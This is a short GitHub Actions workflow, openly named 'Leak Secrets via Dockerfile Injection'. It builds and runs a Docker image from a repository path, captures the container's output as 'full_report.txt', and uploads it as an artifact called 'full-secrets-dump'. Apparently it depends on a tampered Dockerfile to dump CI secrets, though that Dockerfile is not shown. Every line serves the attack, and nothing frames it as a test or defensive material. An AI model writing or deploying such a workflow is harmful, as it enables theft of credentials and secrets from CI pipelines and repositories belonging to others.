name: Leak Secrets via Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  leak:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Build Docker Image
        run: |
          docker build -t secretleak ./taskcluster/docker/python

      - name: Run Container and Extract Leaks
        run: |
          docker run --rm secretleak > full_report.txt

      - name: Upload Secret Report
        uses: actions/upload-artifact@v3.1.3
        with:
          name: full-secrets-dump
          path: full_report.txt
